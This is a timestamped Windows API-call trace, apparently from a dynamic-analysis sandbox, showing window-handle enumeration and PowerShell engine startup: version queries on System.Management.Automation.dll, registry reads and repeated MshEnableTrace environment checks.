	[0065.215] GetWindowThreadProcessId (in: hWnd=0x1015e, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x360
	[0065.215] GetWindowThreadProcessId (in: hWnd=0x1015a, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x274
	[0065.216] GetWindowThreadProcessId (in: hWnd=0x20154, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x588
	[0065.216] GetWindowThreadProcessId (in: hWnd=0x20152, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0xc8
	[0065.216] GetWindowThreadProcessId (in: hWnd=0xa010a, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x21c
	[0065.216] GetWindowThreadProcessId (in: hWnd=0x3014e, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x5ec
	[0065.216] GetWindowThreadProcessId (in: hWnd=0x10144, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x334
	[0065.216] GetWindowThreadProcessId (in: hWnd=0x10142, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x664
	[0065.216] GetWindowThreadProcessId (in: hWnd=0x20138, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x334
	[0065.216] GetWindowThreadProcessId (in: hWnd=0x1012c, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x664
	[0065.216] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x334
	[0065.216] GetWindowThreadProcessId (in: hWnd=0x1011a, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x5ec
	[0065.216] GetWindowThreadProcessId (in: hWnd=0x10118, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x5ec
	[0065.216] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x550
	[0065.217] GetWindowThreadProcessId (in: hWnd=0x2001c, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x7a0
	[0065.217] GetWindowThreadProcessId (in: hWnd=0x6009c, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x594
	[0065.217] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x564
	[0065.217] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x45c
	[0065.217] GetWindowThreadProcessId (in: hWnd=0x100fe, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x548
	[0065.217] GetWindowThreadProcessId (in: hWnd=0x5008e, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x4a0
	[0065.217] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x518
	[0065.217] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x4a0
	[0065.217] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x4a0
	[0065.217] GetWindowThreadProcessId (in: hWnd=0x10068, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x4a0
	[0065.217] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x508
	[0065.218] GetWindowThreadProcessId (in: hWnd=0x10064, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x4a0
	[0065.218] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x4ec
	[0065.218] GetWindowThreadProcessId (in: hWnd=0x1004c, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x4a0
	[0065.218] GetWindowThreadProcessId (in: hWnd=0x10044, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x45c
	[0065.218] GetWindowThreadProcessId (in: hWnd=0x20040, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x45c
	[0065.218] GetWindowThreadProcessId (in: hWnd=0x3003e, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x44c
	[0065.218] GetWindowThreadProcessId (in: hWnd=0x20022, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x7ec
	[0065.220] GetWindowThreadProcessId (in: hWnd=0x100ee, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x45c
	[0065.220] GetWindowThreadProcessId (in: hWnd=0x10134, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x324
	[0065.220] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x4a0
	[0065.220] GetWindowThreadProcessId (in: hWnd=0x1004e, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x4a0
	[0065.220] GetWindowThreadProcessId (in: hWnd=0x701f2, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x854
	[0065.221] GetWindowThreadProcessId (in: hWnd=0x101e0, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x914
	[0065.221] GetWindowThreadProcessId (in: hWnd=0x2019e, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x914
	[0065.221] GetWindowThreadProcessId (in: hWnd=0x501f4, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x140
	[0065.221] GetWindowThreadProcessId (in: hWnd=0x30218, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x55c
	[0065.221] GetWindowThreadProcessId (in: hWnd=0x30222, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x34c
	[0065.221] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0xb40
	[0065.221] GetWindowThreadProcessId (in: hWnd=0x201f8, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x988
	[0065.222] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x868
	[0065.222] GetWindowThreadProcessId (in: hWnd=0x201ac, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x850
	[0065.222] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x830
	[0065.222] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x814
	[0065.222] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x744
	[0065.222] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x2a8
	[0065.222] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x534
	[0065.222] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x5e4
	[0065.222] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x5c4
	[0065.222] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x58c
	[0065.223] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x238
	[0065.223] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x584
	[0065.223] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x7e8
	[0065.223] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x678
	[0065.223] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x35c
	[0065.223] GetWindowThreadProcessId (in: hWnd=0x10164, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x51c
	[0065.223] GetWindowThreadProcessId (in: hWnd=0x10160, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x360
	[0065.223] GetWindowThreadProcessId (in: hWnd=0x1015c, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x274
	[0065.223] GetWindowThreadProcessId (in: hWnd=0x10158, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x588
	[0065.223] GetWindowThreadProcessId (in: hWnd=0x80150, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0xc8
	[0065.223] GetWindowThreadProcessId (in: hWnd=0x400a0, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x21c
	[0065.223] GetWindowThreadProcessId (in: hWnd=0x1012e, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x664
	[0065.224] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x334
	[0065.224] GetWindowThreadProcessId (in: hWnd=0x1011c, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x5ec
	[0065.224] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x550
	[0065.224] GetWindowThreadProcessId (in: hWnd=0x20016, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x7a0
	[0065.224] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x594
	[0065.224] GetWindowThreadProcessId (in: hWnd=0x10106, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x45c
	[0065.224] GetWindowThreadProcessId (in: hWnd=0x10112, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x508
	[0065.224] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x4ec
	[0065.224] GetWindowThreadProcessId (in: hWnd=0x10042, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x45c
	[0065.224] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x7ec
	[0065.290] WerSetFlags () returned 0x0
	[0065.327] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0065.328] CoTaskMemFree (pv=0x0) 
	[0065.328] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1ddad8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1ddad0 | out: pulNumLanguages=0x1ddad8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1ddad0) returned 1
	[0065.329] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1ddad8, pwszLanguagesBuffer=0x2bed6f0, pcchLanguagesBuffer=0x1ddad0 | out: pulNumLanguages=0x1ddad8, pwszLanguagesBuffer=0x2bed6f0, pcchLanguagesBuffer=0x1ddad0) returned 1
	[0065.337] CoTaskMemAlloc (cb=0x24) returned 0x4723e0
	[0065.337] GetUserDefaultLocaleName (in: lpLocaleName=0x4723e0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0065.337] CoTaskMemFree (pv=0x4723e0) 
	[0065.434] CoTaskMemAlloc (cb=0x104) returned 0x3c3ba0
	[0065.434] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0065.434] CoTaskMemFree (pv=0x3c3ba0) 
	[0065.436] CoTaskMemAlloc (cb=0x104) returned 0x3c3ba0
	[0065.436] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0065.436] CoTaskMemFree (pv=0x3c3ba0) 
	[0065.438] CoTaskMemAlloc (cb=0x104) returned 0x3c3ba0
	[0065.438] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0065.438] CoTaskMemFree (pv=0x3c3ba0) 
	[0065.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dd4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0065.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dd540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0065.448] SetErrorMode (uMode=0x1) returned 0x1
	[0065.448] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1dd750 | out: lpFileInformation=0x1dd750*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0065.448] SetErrorMode (uMode=0x1) returned 0x1
	[0065.448] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1dd9c0 | out: lpdwHandle=0x1dd9c0) returned 0x94c
	[0065.449] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2bf0f80 | out: lpData=0x2bf0f80) returned 1
	[0065.450] VerQueryValueW (in: pBlock=0x2bf0f80, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1dd938, puLen=0x1dd930 | out: lplpBuffer=0x1dd938*=0x2bf101c, puLen=0x1dd930) returned 1
	[0065.450] VerQueryValueW (in: pBlock=0x2bf0f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1dd8a8, puLen=0x1dd8a0 | out: lplpBuffer=0x1dd8a8*=0x2bf10f8, puLen=0x1dd8a0) returned 1
	[0065.450] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0065.450] CoTaskMemAlloc (cb=0x2e) returned 0x46c4e0
	[0065.450] lstrcpyW (in: lpString1=0x46c4e0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0065.450] CoTaskMemFree (pv=0x46c4e0) 
	[0065.450] VerQueryValueW (in: pBlock=0x2bf0f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1dd8a8, puLen=0x1dd8a0 | out: lplpBuffer=0x1dd8a8*=0x2bf114c, puLen=0x1dd8a0) returned 1
	[0065.450] lstrlenW (lpString="System.Management.Automation") returned 28
	[0065.450] CoTaskMemAlloc (cb=0x3c) returned 0x4758f0
	[0065.450] lstrcpyW (in: lpString1=0x4758f0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0065.451] CoTaskMemFree (pv=0x4758f0) 
	[0065.451] VerQueryValueW (in: pBlock=0x2bf0f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1dd8a8, puLen=0x1dd8a0 | out: lplpBuffer=0x1dd8a8*=0x2bf11a8, puLen=0x1dd8a0) returned 1
	[0065.451] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0065.451] CoTaskMemAlloc (cb=0x20) returned 0x472440
	[0065.451] lstrcpyW (in: lpString1=0x472440, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0065.451] CoTaskMemFree (pv=0x472440) 
	[0065.451] VerQueryValueW (in: pBlock=0x2bf0f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1dd8a8, puLen=0x1dd8a0 | out: lplpBuffer=0x1dd8a8*=0x2bf11e8, puLen=0x1dd8a0) returned 1
	[0065.451] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0065.451] CoTaskMemAlloc (cb=0x44) returned 0x4758f0
	[0065.451] lstrcpyW (in: lpString1=0x4758f0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0065.451] CoTaskMemFree (pv=0x4758f0) 
	[0065.451] VerQueryValueW (in: pBlock=0x2bf0f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1dd8a8, puLen=0x1dd8a0 | out: lplpBuffer=0x1dd8a8*=0x2bf1250, puLen=0x1dd8a0) returned 1
	[0065.451] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0065.451] CoTaskMemAlloc (cb=0x76) returned 0x40f3d0
	[0065.451] lstrcpyW (in: lpString1=0x40f3d0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0065.451] CoTaskMemFree (pv=0x40f3d0) 
	[0065.451] VerQueryValueW (in: pBlock=0x2bf0f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1dd8a8, puLen=0x1dd8a0 | out: lplpBuffer=0x1dd8a8*=0x2bf12ec, puLen=0x1dd8a0) returned 1
	[0065.451] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0065.452] CoTaskMemAlloc (cb=0x44) returned 0x4758f0
	[0065.452] lstrcpyW (in: lpString1=0x4758f0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0065.452] CoTaskMemFree (pv=0x4758f0) 
	[0065.452] VerQueryValueW (in: pBlock=0x2bf0f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1dd8a8, puLen=0x1dd8a0 | out: lplpBuffer=0x1dd8a8*=0x2bf1350, puLen=0x1dd8a0) returned 1
	[0065.452] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0065.452] CoTaskMemAlloc (cb=0x58) returned 0x3c6500
	[0065.452] lstrcpyW (in: lpString1=0x3c6500, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0065.452] CoTaskMemFree (pv=0x3c6500) 
	[0065.452] VerQueryValueW (in: pBlock=0x2bf0f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1dd8a8, puLen=0x1dd8a0 | out: lplpBuffer=0x1dd8a8*=0x2bf13cc, puLen=0x1dd8a0) returned 1
	[0065.452] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0065.452] CoTaskMemAlloc (cb=0x20) returned 0x472440
	[0065.452] lstrcpyW (in: lpString1=0x472440, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0065.452] CoTaskMemFree (pv=0x472440) 
	[0065.452] VerQueryValueW (in: pBlock=0x2bf0f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1dd8a8, puLen=0x1dd8a0 | out: lplpBuffer=0x1dd8a8*=0x2bf1074, puLen=0x1dd8a0) returned 1
	[0065.452] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0065.452] CoTaskMemAlloc (cb=0x66) returned 0x4703d0
	[0065.452] lstrcpyW (in: lpString1=0x4703d0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0065.452] CoTaskMemFree (pv=0x4703d0) 
	[0065.452] VerQueryValueW (in: pBlock=0x2bf0f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1dd8a8, puLen=0x1dd8a0 | out: lplpBuffer=0x1dd8a8*=0x0, puLen=0x1dd8a0) returned 0
	[0065.452] VerQueryValueW (in: pBlock=0x2bf0f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1dd8a8, puLen=0x1dd8a0 | out: lplpBuffer=0x1dd8a8*=0x0, puLen=0x1dd8a0) returned 0
	[0065.452] VerQueryValueW (in: pBlock=0x2bf0f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1dd8a8, puLen=0x1dd8a0 | out: lplpBuffer=0x1dd8a8*=0x0, puLen=0x1dd8a0) returned 0
	[0065.452] VerQueryValueW (in: pBlock=0x2bf0f80, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1dd878, puLen=0x1dd870 | out: lplpBuffer=0x1dd878*=0x2bf101c, puLen=0x1dd870) returned 1
	[0065.452] CoTaskMemAlloc (cb=0x204) returned 0x408e50
	[0065.452] VerLanguageNameW (in: wLang=0x0, szLang=0x408e50, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0065.452] CoTaskMemFree (pv=0x408e50) 
	[0065.452] VerQueryValueW (in: pBlock=0x2bf0f80, lpSubBlock="\\", lplpBuffer=0x1dd8c8, puLen=0x1dd8c0 | out: lplpBuffer=0x1dd8c8*=0x2bf0fa8, puLen=0x1dd8c0) returned 1
	[0065.460] CoTaskMemAlloc (cb=0x104) returned 0x3c3ba0
	[0065.460] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0065.460] CoTaskMemFree (pv=0x3c3ba0) 
	[0065.623] CoTaskMemAlloc (cb=0x104) returned 0x3c3ba0
	[0065.623] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0065.623] CoTaskMemFree (pv=0x3c3ba0) 
	[0065.635] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1dd798 | out: phkResult=0x1dd798*=0x308) returned 0x0
	[0065.637] RegOpenKeyExW (in: hKey=0x308, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x1dd788 | out: phkResult=0x1dd788*=0x30c) returned 0x0
	[0065.637] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1dd818 | out: phkResult=0x1dd818*=0x310) returned 0x0
	[0065.641] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1dd75c, lpData=0x0, lpcbData=0x1dd758*=0x0 | out: lpType=0x1dd75c*=0x1, lpData=0x0, lpcbData=0x1dd758*=0x56) returned 0x0
	[0065.642] CoTaskMemAlloc (cb=0x5a) returned 0x470360
	[0065.642] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1dd72c, lpData=0x470360, lpcbData=0x1dd728*=0x56 | out: lpType=0x1dd72c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1dd728*=0x56) returned 0x0
	[0065.642] CoTaskMemFree (pv=0x470360) 
	[0065.712] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dd2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0065.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dd2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0065.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dd2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0065.821] CoTaskMemAlloc (cb=0x104) returned 0x3c3ba0
	[0065.821] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0065.821] CoTaskMemFree (pv=0x3c3ba0) 
	[0068.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1dd350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0068.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1dd350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0069.631] CoTaskMemAlloc (cb=0x104) returned 0x3c3cb0
	[0069.631] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3cb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0069.631] CoTaskMemFree (pv=0x3c3cb0) 
	[0069.632] CoTaskMemAlloc (cb=0x104) returned 0x3c3cb0
	[0069.632] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3cb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0069.632] CoTaskMemFree (pv=0x3c3cb0) 
	[0070.027] CoTaskMemAlloc (cb=0x104) returned 0x3c3cb0
	[0070.027] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3cb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0070.027] CoTaskMemFree (pv=0x3c3cb0) 
	[0070.029] CoTaskMemAlloc (cb=0x104) returned 0x3c3cb0
	[0070.029] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3cb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0070.029] CoTaskMemFree (pv=0x3c3cb0) 
	[0070.029] CoTaskMemAlloc (cb=0x104) returned 0x3c3cb0
	[0070.029] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3cb0, nSize=0x80 | out: lpBuffer="") returned 0x0
